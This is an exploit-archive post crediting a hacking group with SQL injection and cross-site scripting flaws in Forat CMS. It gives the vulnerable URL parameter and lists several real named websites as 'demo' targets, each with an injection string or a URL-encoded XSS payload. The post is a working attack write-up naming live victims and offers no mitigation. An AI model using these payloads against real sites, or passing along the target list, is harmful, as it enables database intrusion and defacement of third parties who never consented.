Forat CMS - SQL Injection / XSS
Posted on 30 November -0001
<HTML><HEAD><TITLE>Forat CMS - SQL Injection / XSS</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Forat CMS - SQL Injection / XSS # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.foratnet.com/ # Category: [ Webapps ] # Tested on: [ Win ] # Date: 2016/05/27 ###################### # # PoC: # 1.Sql injection = # http://site.com/index.php?act=artc&id=[SQL] # Demo : # http://www.mudharclub.org.sa/index.php?act=artc&id=686%27 # http://okhdood.net/index.php?act=artc&id=17247%27 # http://www.umalhamam.org/index.php?act=artc&id=9677%27 # http://www.minbaralqatif.net/?act=artc&id=323%27 # http://www.al-saif.net/?act=artc&id=311%27 # 2.XSS = # Demo: # http://www.mudharclub.org.sa/index.php?act=artc&id=%27%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4px%3Ec_C%20%3C/font%3E%3C/marquee%3E # http://okhdood.net/index.php?act=artc&id=%27%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4px%3Ec_C%20%3C/font%3E%3C/marquee%3E # ###################### # Discovered by : # Mojtaba MobhaM & T3NZOG4N & FireKernel # Greetz : Milad Hacking And All Persian Hack Team Members # Homepage : persian-team.ir ###################### </BODY></HTML>
